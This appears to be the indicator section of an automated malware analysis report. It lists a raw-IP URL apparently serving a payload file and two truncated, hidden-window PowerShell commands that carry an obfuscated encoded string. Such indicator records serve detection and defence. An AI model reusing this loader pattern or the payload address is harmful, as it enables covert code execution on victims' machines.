Technical Information
- http://91.213.50.74//cryps/q9/dll3f3.txt
- '91.##3.50.74':80
- http://91.##3.50.74//CRYPS/Q9/dll3f3.txt
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command $ExeNy = 'J▒Bh▒GM▒c▒Bo▒HU▒I▒▒9▒C▒▒Jw▒w▒DE▒N▒▒n▒Ds▒J▒Bj▒Gw▒bgB0▒Gc▒I▒▒9▒C▒▒Jw▒l▒H▒▒egBB▒GM▒TwBn▒Ek▒bgBN▒HI▒JQ▒n▒Ds▒WwBC▒Hk▒d▒Bl▒Fs▒XQBd▒C▒▒J▒B1▒GI▒cQB1▒HI▒I▒▒9▒C▒▒WwBz▒Hk▒cwB0▒GU▒bQ▒u▒E...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command $ExeNy = 'J▒Bh▒GM▒c▒Bo▒HU▒I▒▒9▒C▒▒Jw▒w▒DE▒N▒▒n▒Ds▒J▒Bj▒Gw▒bgB0▒Gc▒I▒▒9▒C▒▒Jw▒l▒H▒▒egBB▒GM▒TwBn▒Ek▒bgBN▒HI▒JQ▒n▒Ds▒WwBC▒Hk▒d▒Bl▒Fs▒XQBd▒C▒▒J▒B1▒GI▒cQB1▒HI▒I▒▒9▒C▒▒WwBz▒Hk▒cwB0▒GU▒bQ▒u▒E...